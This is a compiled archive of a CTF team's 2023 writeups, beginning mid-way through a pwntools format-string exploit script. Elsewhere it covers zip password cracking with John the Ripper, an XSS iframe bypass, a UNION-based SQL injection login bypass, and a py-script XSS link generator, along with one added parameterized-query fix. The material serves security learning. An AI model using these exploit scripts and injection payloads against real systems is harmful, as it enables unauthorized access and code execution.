    writes = {0x601020 : 0x4007e7, # GOT _stack_chk_fail -> main 0x00000000004007e8
              stack_canary : 0x0f}
    p = fmtstr_payload(8, writes, numbwritten=0)
    print(len(p))
    io.sendlineafter('ence?\n',p)
    print('pass step 2')

    # Step 3
    p ='-2147483647'
    io.sendline(p)

    writes = {
        exe.got['printf'] : exe.plt['system'], # GOT printf -> main system
        stack_canary-0x80-0x10 : 0x0f
    }
    p = fmtstr_payload(8, writes, numbwritten=0)
    io.sendlineafter('ence?\n',p)
    print('pass step 3')

    # Step 4
    p ='-2147483647'
    io.sendline(p)
    p ='cat flag*'
    io.sendline(p)

    io.interactive()

# exploit()
for i in range(1000):
    try:
        exploit()
    except Exception as e:
        pass
```
--------------------------------------------------------------------------------
/2023/VU-Cyberthon-2023/README.md:
--------------------------------------------------------------------------------
## Weak Password
In this challenge we are given a locked zip file. To unlock it we need to use John the Ripper.

First we convert the zip into John's format
```sh
zip2john taskweakpassword.zip > hash.txt
```

Then we crack it using a SecLists wordlist
```sh
john -w=/usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-1000000.txt hash.txt
```

We can check the result with
```sh
john --show hash.txt
```

output
```
taskweakpassword.zip/taskweakpassword/about.txt:Kaunas:taskweakpassword/about.txt:taskweakpassword.zip::taskweakpassword.zip

1 password hash cracked, 0 left
```
After that we need to wrap the password in VU{.*}
Flag: VU{Kaunas}

## External writeup from our team
### Daffainfo
https://github.com/daffainfo/ctf-writeup/tree/main/VU%20CYBERTHON%202023

| Category | Challenge |
| --- | --- |
| Cryptography, Web Exploitation | [Simple Web](/VU%20CYBERTHON%202023/Simple%20Web/) |
| Cryptography, Web Exploitation | [Docker Web](/VU%20CYBERTHON%202023/Docker%20Web/) |
| Network Security | [Blue Baby Shark](/VU%20CYBERTHON%202023/Blue%20Baby%20Shark/) |
| OSINT | [RFC standard for security policy information](/VU%20CYBERTHON%202023/RFC%20standard%20for%20security%20policy%20information/) |
| OSINT | [Find location](/VU%20CYBERTHON%202023/Find%20location/) |
| Digital Forensics | [What is SHA1 checksum of image file blk0_mmcblk0.bin ?](/VU%20CYBERTHON%202023/What%20is%20SHA1%20checksum%20of%20image%20file%20blk0_mmcblk0.bin/) |
| Digital Forensics | [What is the name of the largest partition?](/VU%20CYBERTHON%202023/What%20is%20the%20name%20of%20the%20largest%20partition/) |
| Digital Forensics | [What email address is setup on com.android.email service?](/VU%20CYBERTHON%202023/What%20email%20address%20is%20setup%20on%20com.android.email%20service/) |
| Digital Forensics | [What is the brand (vendor) of phone?](/VU%20CYBERTHON%202023/What%20is%20the%20brand%20(vendor)%20of%20phone/) |
| Digital Forensics | [Find ICCID Number](/VU%20CYBERTHON%202023/Find%20ICCID%20Number/) |
| Digital Forensics | [Find MSISDN Number](/VU%20CYBERTHON%202023/Find%20MSISDN%20Number/) |
| Digital Forensics | [What is the name of the username telegram?](/VU%20CYBERTHON%202023/What%20is%20the%20name%20of%20the%20username%20telegram/) |
| Digital Forensics | [What is the model of the phone?](/VU%20CYBERTHON%202023/What%20is%20the%20model%20of%20the%20phone/) |
| Digital Forensics | [What is the name of WhatsApp user which has phone number +37062166565?](/VU%20CYBERTHON%202023/What%20is%20the%20name%20of%20WhatsApp%20user%20which%20has%20phone%20number%20%2B37062166565/) |
| Digital Forensics | [How much dollars the seized weapons (stuff) may have cost?](/VU%20CYBERTHON%202023/How%20much%20dollars%20the%20seized%20weapons%20(stuff)%20may%20have%20cost/) |
| Digital Forensics | [What tank specs the user was looking for?](/VU%20CYBERTHON%202023/What%20tank%20specs%20the%20user%20was%20looking%20for/) |
| Digital Forensics | [What web address was provided for a company that can rent cargo planes?](/VU%20CYBERTHON%202023/What%20web%20address%20was%20provided%20for%20a%20company%20that%20can%20rent%20cargo%20planes/) |
| Digital Forensics | [What is a name of video file which is related with tanks?](/VU%20CYBERTHON%202023/What%20is%20a%20name%20of%20video%20file%20which%20is%20related%20with%20tanks/) |
| Digital Forensics | [Based on the analysis of the video file 20221015_173902.mp4, please provide the GPS coordinates of the possible place, where video was recorded?](/VU%20CYBERTHON%202023/Based%20on%20the%20analysis%20of%20the%20video%20file%2020221015_173902.mp4%2C%20please%20provide%20the%20GPS%20coordinates%20of%20the%20possible%20place%2C%20where%20video%20was%20recorded/) |
| Digital Forensics | [Based on the review of the media files, please provide the GPS coordinates of the possible meeting point.](/VU%20CYBERTHON%202023/Based%20on%20the%20review%20of%20the%20media%20files%2C%20please%20provide%20the%20GPS%20coordinates%20of%20the%20possible%20meeting%20point/) |

--------------------------------------------------------------------------------
/2023/WaniCtf 2023/README.md:
--------------------------------------------------------------------------------
---
Chall Archive: "https://drive.google.com/drive/folders/1pLS49uUfsT05XXTK7ZJRkHqWEhF2lW-_?usp=sharing"
---

Our Team Writeup
===

## dimas maulana

WaniCTF 2023 Writeup.

Web Challenges:
- screenshot
- certified 2
- Lambda

Misc Challenges:
- machine_loading

[https://hackmd.io/@Solderet/SomeWriteupForWaniCTF2023-XogSiA](https://hackmd.io/@Solderet/SomeWriteupForWaniCTF2023-XogSiA "https://hackmd.io/@Solderet/SomeWriteupForWaniCTF2023-XogSiA")

## daffainfo

Writeup WaniCTF 2023 (English)

```
Category    Challenge
Crypto      EZDORSA_Lv1
Crypto      EZDORSA_Lv2
Crypto      EZDORSA_Lv3
Crypto      pqqp
Web         Extract Service 1
Reversing   Just_Passw0rd
Misc        Guess
Misc        int_generator
```

https://github.com/daffainfo/ctf-writeup/tree/main/WaniCTF%202023

--------------------------------------------------------------------------------
/2023/bbctf-2023/Pasted image 20230206061956.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/bbctf-2023/Pasted image 20230206061956.png
--------------------------------------------------------------------------------
/2023/bbctf-2023/Pasted image 20230206062058.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/bbctf-2023/Pasted image 20230206062058.png
--------------------------------------------------------------------------------
/2023/bbctf-2023/Pasted image 20230206062127.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/bbctf-2023/Pasted image 20230206062127.png
--------------------------------------------------------------------------------
/2023/bbctf-2023/Pasted image 20230206062218.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/bbctf-2023/Pasted image 20230206062218.png
--------------------------------------------------------------------------------
/2023/ctf-after-dark-winter-2023/README.md:
--------------------------------------------------------------------------------
# Spiteful XSS - Web
## Description
Everyone keeps exploiting my site, so I deleted all the globals.

## Solve
In this challenge we are given the following website.
https://spiteful-xss.acmcyber.com/

The website is vulnerable to XSS, but almost none of the built-in functions can be used.

At the top of the HTML we find the script below, which deletes all global variables so that we cannot carry out XSS.

```html

```

How do we bypass it?

Here we can use an `iframe`: an iframe creates a new DOM in which the built-in functions are available again.

Payload XSS:
```html

```

Get flag:
```html

```

# Injection Perfection - Web
## Description
After port scanning the acmcyber site, I found this hidden login page. After bruteforcing I discovered the user: joe, has the password: bruin, but I didn't find anything useful. Can you log in as admin?

## Solve
In the source code we find an endpoint that is vulnerable to SQL injection.

```js
const attemptLogin = (username, password) => {
    return new Promise((resolve, reject) => {
        // username is interpolated directly into the SQL text
        db.get(`SELECT username, password FROM users WHERE username='${username}'`, async (err, row) => {
            if (err)
                return reject(err);
            else if (row === undefined)
                return reject('Invalid User');
            else if (password === row.password)
                return resolve(`My favorite color is ${await getFavColor(row.username)}`);
            else
                return reject('incorrect password');
        });
    })
};
...snip..
app.post('/', async (req, res) => {
    const username = req.body.username;
    const password = req.body.password;

    if (!username || !password)
        return res.status(400).send("Invalid Login");

    try {
        return res.status(200).send(await attemptLogin(username, password));
    } catch (err) {
        return res.status(400).send(err);
    }
});
```

We can send this endpoint a POST request containing a UNION-based SQLi like the following to bypass authentication.

```
username='UNION/**/SELECT/**/"admin",'asd&password=asd
```

After that we get the flag in the response content.
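
Why the password check in `attemptLogin` does not stop this, and what the fix looks like: the following is an added example, not code from the challenge or the original writeup. It re-creates the login query in Python with the standard `sqlite3` module as a stand-in for the Node code; the table layout, the admin password and the function names are assumptions made for the demonstration.

```python
import hmac
import sqlite3

# The injection values shown in the writeup above (username and password fields).
PAGE_PAYLOAD_USERNAME = "'UNION/**/SELECT/**/\"admin\",'asd"
PAGE_PAYLOAD_PASSWORD = "asd"


def make_db():
    """In-memory stand-in for the challenge database (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        # joe/bruin is from the challenge description; the admin password is a placeholder
        [("joe", "bruin"), ("admin", "constructed-admin-password")],
    )
    return conn


def attempt_login_vulnerable(conn, username, password):
    """Mirrors attemptLogin: the username is pasted into the SQL text."""
    query = f"SELECT username, password FROM users WHERE username='{username}'"
    row = conn.execute(query).fetchone()
    if row is None:
        return None
    # The row may come entirely from an injected UNION branch, so this compares
    # the submitted password with a value the client chose, not the stored one.
    return row[0] if password == row[1] else None


def attempt_login_safe(conn, username, password):
    """Same flow with a bound parameter: the username can only ever be a value."""
    row = conn.execute(
        "SELECT username, password FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return None
    # Constant-time comparison of the submitted and stored passwords
    matches = hmac.compare_digest(password.encode(), row[1].encode())
    return row[0] if matches else None


def demo():
    """Run the page's payload and a legitimate login through both versions."""
    conn = make_db()
    return {
        "vulnerable, page payload": attempt_login_vulnerable(
            conn, PAGE_PAYLOAD_USERNAME, PAGE_PAYLOAD_PASSWORD),
        "parameterized, page payload": attempt_login_safe(
            conn, PAGE_PAYLOAD_USERNAME, PAGE_PAYLOAD_PASSWORD),
        "parameterized, joe/bruin": attempt_login_safe(conn, "joe", "bruin"),
    }


if __name__ == "__main__":
    for case, user in demo().items():
        print(f"{case}: logged in as {user!r}")
```

In the Node code the equivalent change is to pass the username as a bound parameter to `db.get` instead of building the query with a template string.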

# Jester - web

```python
import math
import re

from requests import Session

url = "https://jester.acmcyber.com/"

# Use one session so cookies are kept between requests
session = Session()
r = session.get(url)
cok = session.cookies.get_dict()

# Round 1 = addition
x1 = re.findall(r"What is (.*) \?</p>", r.content.decode('utf-8'))
# eval() executes text taken from the server's response
data = eval(x1[0])

ans = {'answer': data}
print('r1 =', ans)

r1 = session.post(url=url+'validate', data=ans)

# Round 2 = quadratic equation
x2 = re.findall(r"What are the roots of (.*) \?</p>", r1.content.decode())

# Pull every number out of the equation, then drop the exponent of x^2
quadratic = re.findall(r'\d+', x2[0])
coefficients = [int(coefficient) for coefficient in quadratic]
coefficients.pop(1)

x = coefficients[0]
y = coefficients[1]
z = coefficients[2]

# Discriminant, then both roots from the quadratic formula
cal = (y**2) - (4*x*z)

sol1 = (-y - math.sqrt(cal)) / (2*x)
sol2 = (-y + math.sqrt(cal)) / (2*x)

rd1 = round(sol1)
rd2 = round(sol2)

ans2 = {'answer1': rd1, 'answer2': rd2}
print('r2 =', ans2)

r2 = session.post(url=url+'validate', data=ans2)
print(r2.content)
```

# Our Team Writeup

Daffainfo: https://github.com/daffainfo/ctf-writeup/tree/main/CTF%20After%20Dark%20-%20Winter%202023

| Category | Challenge |
| --- | --- |
| Intro | Cookies |
| Intro | Secure Platform |
| Intro | Bagels |
| SQLi | Bank |
| SQLi | SQL Prevention-101 |
| LFI | Star Poet Blog |

RisyadAR: https://rizsyad.github.io/CTF-WriteUp/#/2023/After%20Dark%20Winter/

- Website
  - [Birthday](https://rizsyad.github.io/CTF-WriteUp/#/2023/After%20Dark%20Winter/Web/Birthday/)
  - [Mean Girls](https://rizsyad.github.io/CTF-WriteUp/#/2023/After%20Dark%20Winter/Web/Mean%20Girls/)
  - [What's on the Menu?](https://rizsyad.github.io/CTF-WriteUp/#/2023/After%20Dark%20Winter/Web/What's%20on%20the%20Menu%3F/)
  - [Simple Calculator](https://rizsyad.github.io/CTF-WriteUp/#/2023/After%20Dark%20Winter/Web/Simple%20Calculator/)
  - [No Fetch?!?!](https://rizsyad.github.io/CTF-WriteUp/#/2023/After%20Dark%20Winter/Web/No%20Fetch%3F!%3F!/)

# etc

CTF source code: https://github.com/uclaacm/ctf-after-dark-w23
--------------------------------------------------------------------------------
/2023/damctf-2023/README.md:
--------------------------------------------------------------------------------
# tcl-tac-toe - web
## Description
Time to tackle tcl-tac-toe: the tricky trek towards top-tier triumph

http://tcl-tac-toe.chals.damctf.xyz/

http://161.35.58.232/

## Exploit
An attachment is provided for this challenge, which reveals the use of an uncommon programming language, namely [tcl](https://wapp.tcl-lang.org/).

Upon accessing the challenge's website, it becomes apparent that the site is hosting a game of tic-tac-toe, as depicted in the image below.

The tic-tac-toe game is impossible to win because the bot cheats by taking two moves before it can lose.

We will use Burp Suite to intercept what happens in the background. As shown in the image below, the bot uses a type of Message Authentication Token to verify whether the input has been tampered with.

Tampering with the request will result in a response that looks like this:

Is it possible to bypass this and obtain the flag? It appears that we can still play the game even if we have already lost, because the function `check_win` in the source code does not prevent this type of undefined behavior from occurring.

```tcl
proc check_win {board} {
    set win {{1 2 3} {4 5 6} {7 8 9} {1 4 7} {2 5 8} {3 6 9} {1 5 9} {3 5 7}}
    foreach combo $win {
        foreach player {X O} {
            set count 0
            set index [lindex combo 0]
            foreach cell $combo {
                if {[lindex $board [expr {$cell - 1}]] != $player} {
                    break
                }
                incr count
            }
            if {$count == 3} {
                return $player
            }
        }
    }
    # check if it's a tie
    if {[string first {-} $board] == -1} {
        return {tie}
    }
    return {-}
}
```

We will now open the developer console and set a breakpoint on the if statement just before `location.reload` is invoked.

Keep playing the game until the alert pops up, then click OK.

Once we hit the breakpoint, modify the value of `message` to a random value.

After making the modification, win the game.

After winning the game, the flag should be obtained.

# Url-Stored-Notes - damctf - web
In this challenge we are given the source, which can be found in the following Google Drive folder: https://drive.google.com/drive/folders/18HfXS1sXOB1OB14aPjyu2flsksibD4rs

According to the source code, we can add arbitrary tags to the HTML except the `script` tag. Because the website uses the py-script extension, we can use that to get XSS.

On the website we find a page like this for creating the tag, and when we click share, a link appears as in the image below.

Here we can manipulate that URL using the following script:

```python
from base64 import b64encode
from lzma import compress
import json

def encodeNotes(prompt, answer, tag):
    # The share link carries the notes as base64(lzma(JSON)) after the '#'
    return b64encode(compress(json.dumps([{
        "prompt": prompt,
        "answer": answer,
        "tag": tag,
    }]).encode()))

a = encodeNotes("""js.eval('alert(1)')""", "#foo>", "py-script").decode()
a = "http://localhost:8080/#"+a
print(a)
```

# CTF challenges git
[https://gitlab.com/osusec/damctf-2023-challenges/](https://gitlab.com/osusec/damctf-2023-challenges/ "https://gitlab.com/osusec/damctf-2023-challenges/")

# Chall Archive:

[https://drive.google.com/drive/folders/16GdzGztpCepHJWzxZYmO4dfATQhE6ibR?usp=sharing](https://drive.google.com/drive/folders/16GdzGztpCepHJWzxZYmO4dfATQhE6ibR?usp=sharing "https://drive.google.com/drive/folders/16GdzGztpCepHJWzxZYmO4dfATQhE6ibR?usp=sharing")
--------------------------------------------------------------------------------
/2023/deadsec-ctf-2023/README.md:
--------------------------------------------------------------------------------
---
archive: https://drive.google.com/drive/folders/11CKmFHEW63B62bUw9HlFv-7W4nZPrnin?usp=share_link
---

## Our Team Member Writeup

- https://github.com/daffainfo/ctf-writeup/tree/main/DeadSec%20CTF%202023
```
Web FRSS
Web Bing
Web XEE1
```

- https://hyggehalcyon.gitbook.io/page/ctfs/2023/deadsec-ctf-2023
```
pwn-one-punch
```

--------------------------------------------------------------------------------
/2023/gray-cat-the-flag-2023-qualifier/README.md:
--------------------------------------------------------------------------------
---
archive: https://drive.google.com/drive/folders/15jPr0S6WbEteq0pJLvR1YKjWzDum79CQ?usp=sharing
archive: https://github.com/NUSGreyhats/greyctf23-challs-public
---
--------------------------------------------------------------------------------
/2023/m0leConCTF-2023/README.md:
--------------------------------------------------------------------------------
## Our Team Writeup
- @dimasma0305 web-goldinopizza2: https://hackmd.io/@Solderet/m0leCon-ctf-exploiting-race-condition-goldinopizza2
--------------------------------------------------------------------------------
/2023/plaidCTF 2023/README.md:
--------------------------------------------------------------------------------
Our Team Writeup
===

@Maulvi Alfansuri
- https://maulvialf.medium.com/write-up-reversing-plaid-ctf-2023-2e3ba1e3d539

· Treasure
· CSS
· Epilogue
--------------------------------------------------------------------------------
/2023/wolvctf-2023/Pasted image 20230323041112.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/wolvctf-2023/Pasted image 20230323041112.png
--------------------------------------------------------------------------------
/2023/wolvctf-2023/Pasted image 20230323041128.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/wolvctf-2023/Pasted image 20230323041128.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# TCP1P CTF Writeup
Writeup from TCP1P CTF community.
--------------------------------------------------------------------------------